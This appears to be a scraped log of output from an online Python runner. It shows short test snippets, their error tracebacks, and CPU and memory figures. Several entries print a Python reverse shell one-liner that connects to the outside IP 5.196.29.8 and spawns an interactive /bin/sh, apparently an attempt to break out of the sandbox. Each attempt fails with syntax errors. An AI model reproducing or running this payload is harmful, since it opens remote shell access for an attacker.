α
print("hello")
Size: a a a
α
M
hello
CPU Time: 0.01 s
Memory: 7732 KB
α
M
Linux
Traceback (most recent call last):
File "jdoodle.py", line 3, in <module>
print(platform.relese())
AttributeError: module 'platform' has no attribute 'relese'
CPU Time: 0.05 s
Memory: 9480 KB
α
M
Linux
4.8.0-41-generic
CPU Time: 0.04 s
Memory: 9432 KB
НЕ
M
File "jdoodle.py", line 2
print (i^3)
^
IndentationError: expected an indented block
CPU Time: 0.01 s
Memory: 7644 KB
НЕ
M
File "jdoodle.py", line 2
print(i^3)
^
IndentationError: expected an indented block
CPU Time: 0.02 s
Memory: 7652 KB
α
M
File "jdoodle.py", line 1
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("5.196.29.8",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
^
SyntaxError: EOL while scanning string literal
CPU Time: 0.02 s
Memory: 7792 KB
α
НЕ
α
M
File "jdoodle.py", line 2
printf(i^3)
^
IndentationError: expected an indented block
CPU Time: 0.01 s
Memory: 7748 KB
M
File "jdoodle.py", line 5
os.dup2(s.fileno(),2)
^
IndentationError: unexpected indent
CPU Time: 0.01 s
Memory: 7620 KB
α
M
File "jdoodle.py", line 6
p=subprocess.call(["/bin/sh","-i"]);'
^
SyntaxError: EOL while scanning string literal
CPU Time: 0.01 s
Memory: 7644 KB
α